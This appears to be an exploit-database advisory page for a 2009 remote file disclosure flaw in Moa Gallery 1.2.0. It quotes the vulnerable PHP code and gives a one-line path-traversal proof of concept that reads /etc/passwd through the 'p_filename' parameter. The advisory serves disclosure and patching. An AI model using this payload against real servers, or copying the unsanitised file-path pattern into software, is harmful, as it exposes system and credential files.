header-logo
Suggest Exploit
vendor:
Moa Gallery
by:
milw0rm.com
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: Moa Gallery
Affected Version From: 1.2.0
Affected Version To: 1.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:moa_gallery:moa_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability

Moa Gallery version 1.2.0 and prior are vulnerable to a remote file disclosure vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'p_filename' parameter in the '_template_parser.php' script. An attacker can exploit this vulnerability to disclose sensitive files from the server.

Mitigation:

Upgrade to the latest version of Moa Gallery.
Source

Exploit-DB raw data:

Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability
Code In sources\_template_parser.php


    $filename = $MOA_PATH."templates/".$template_name."/".$p_filename;

    $fp = @fopen($filename, "r");
    if ((!$fp) && (is_bool($fp)))
    {
      $fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r");

POC
/sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd

# milw0rm.com [2009-08-26]

Navigation

Suggest Exploit

Services By CQR